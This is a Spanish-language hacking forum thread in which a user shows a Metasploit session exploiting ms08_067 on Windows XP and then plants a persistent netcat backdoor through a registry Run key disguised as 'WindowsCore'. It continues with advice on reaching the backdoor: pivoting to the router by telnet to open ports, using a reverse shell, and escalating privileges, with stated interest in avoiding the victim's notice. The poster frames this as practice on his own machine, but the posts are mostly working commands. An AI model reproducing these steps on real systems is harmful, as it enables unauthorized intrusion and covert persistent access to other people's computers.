Autor
|
Tema: Duda sobre re-crear aceso a mi Backdoor (Leído 7,579 veces)
|
Debci
Wiki
Desconectado
Mensajes: 2.021
Actualizate o muere!
|
Hola a todos, recientemente practicando PenTest con un equipo remoto (es mio si...) consegui explotarle una vulnerabilidad y bindearme a una reverse tcp meterpreter, una vez en su equipo, me dispuse a asegurarme el aceso, lo hice de la siguiente manera (basandome en lo que Kamsky explicó): ## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ##
=[ metasploit v3.3.2-release [core:3.3 api:1.0] + -- --=[ 462 exploits - 219 auxiliary + -- --=[ 192 payloads - 22 encoders - 8 nops =[ svn r7808 updated 7 days ago (2009.12.10)
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xx RHOST => xx.xx.xx.xx msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.0.3 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST xx.xx.xx.xx no The target address
Exploit target:
Id Name -- ---- 0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish[*] Selected Target: Windows XP SP2 Spanish (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (xx.xx.xx.xx:1934 -> xx.xx.xx.xx:4444)
meterpreter > Una vez dentro me dispuse a subir el netcat.exe y ponerlo con la shell en un puerto y escribirlo en el registro: meterpreter > upload /root/tools/nc.exe C:\\Windows\\System32\\ [*] uploading : /root/tools/nc.exe -> C:\Windows\System32\ [*] uploaded : /root/tools/nc.exe-> C:\Windows\System32\\nc.exe meterpreter > Una vez subido y que se puede ejecutar en la consola sin ruta especifica: meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v WindowsCore -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe' Successful set Hacked. meterpreter > Lo pondrá a la espera en el puerto 1234, pero si ese puerto no esta mapeado en el router como diablos voy a conectarme a la backdoor?Puedo de alguna manera abrir puertos en su router? Estuve pensando en subirle un servidor VNC pero es muy cutre, y se daria cuenta de que estan trasteando(en el caso de que fuese una situación real...). A expensas de que muchos van a decir que como es tu router abrelos tu, les diré que en una situación real no se puede hacer eso, y quiero hacerlo todo como si una real se tratase! Saludos y gracias a todos!
|
|
|
En línea
|
|
|
|
kamsky
|
si tienes acceso al PC, salta desde este a la conf del router y abre los puertos, no deberías de tener muchos problemas, otra opción es una reverse shell, que sea la víctima la que se conecte a tí
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
Debci
Wiki
Desconectado
Mensajes: 2.021
Actualizate o muere!
|
si tienes acceso al PC, salta desde este a la conf del router y abre los puertos, no deberías de tener muchos problemas, otra opción es una reverse shell, que sea la víctima la que se conecte a tí
asi lo he intentado pero ahora mi supuesta victima no tengo permisos de administracion :S Ni puedo escribir registro ni nada (lo del reverse ya he visto que puedo, es efectivo) Y con lo que se no puedo escalar privilegios remotamente... Alguna idea? Saludos
|
|
|
En línea
|
|
|
|
kamsky
|
tienes acceso al router desde el PC?? busca bugs en windows recientes que te permitan escalar privilegios, últimamente hay bastantes
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
Debci
Wiki
Desconectado
Mensajes: 2.021
Actualizate o muere!
|
tienes acceso al router desde el PC?? busca bugs en windows recientes que te permitan escalar privilegios, últimamente hay bastantes Bien me pongo a ello, aceso al router? Mmm desde consola? Saludos
|
|
|
En línea
|
|
|
|
kamsky
|
si, suele haber acceso por telnet a los routers, una vez que te logues tendrás un menú parecido al que te sale por Web, en mi caso este:
Main Menu
1. ADSL Link State 2. LAN 3. WAN 4. DNS Server 5. Route Setup 6. NAT 7. Firewall 8. Quality Of Service 9. Management 10. Passwords 11. Reset to Default 12. Save and Reboot 13. Exit ->
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
Debci
Wiki
Desconectado
Mensajes: 2.021
Actualizate o muere!
|
si, suele haber acceso por telnet a los routers, una vez que te logues tendrás un menú parecido al que te sale por Web, en mi caso este:
Main Menu
1. ADSL Link State 2. LAN 3. WAN 4. DNS Server 5. Route Setup 6. NAT 7. Firewall 8. Quality Of Service 9. Management 10. Passwords 11. Reset to Default 12. Save and Reboot 13. Exit ->
Entiendo... EDITO: Le hago una conexion a la puerta de enlace del router? Ahora he buscado exploits para escalar privilegios, he leido sobre el ms10_15 pero no hay nada especifico sobre el, solamente lo que hace... He visto metodos, pero tendria que tener aceso fisico al pc para escalarlos, otra posibilidad es crackear la pass de admin pero si me deslogueo por consola pierdo conexion con el meterpreter. He pensado que en una situacion real se podria hacer con ingenieria social, pero descarto dicha posiblidad. Saludos
|
|
« Última modificación: 31 Julio 2010, 13:04 pm por Debci »
|
En línea
|
|
|
|
kamsky
|
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
Debci
Wiki
Desconectado
Mensajes: 2.021
Actualizate o muere!
|
O soy muy inutil o no veo ninguno de escala de privilegios xD El de lnk code execution lo he leido pero no hay exploit, y no es intencion opcodearlo sobre la marcha... Saludos
|
|
|
En línea
|
|
|
|
kamsky
|
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Duda sobre crear servidor
Redes
|
crazykenny
|
5
|
4,354
|
2 Julio 2011, 20:34 pm
por crazykenny
|
|
|
DUDA ¿Como hacer una backdoor?
Análisis y Diseño de Malware
|
TopoJunior
|
3
|
12,652
|
28 Enero 2013, 21:16 pm
por alister
|
|
|
Duda sobre crear aplicacion
Dudas Generales
|
GDomination
|
1
|
2,604
|
31 Octubre 2013, 17:48 pm
por ZeroVzla
|
|
|
Tengo una duda con WSO shell backdoor
Dudas Generales
|
BASUH
|
0
|
2,371
|
18 Octubre 2016, 01:01 am
por BASUH
|
|
|
Duda para crear un backdoor
Análisis y Diseño de Malware
|
Gurutu
|
4
|
4,804
|
31 Marzo 2020, 22:42 pm
por ThunderCls
|
|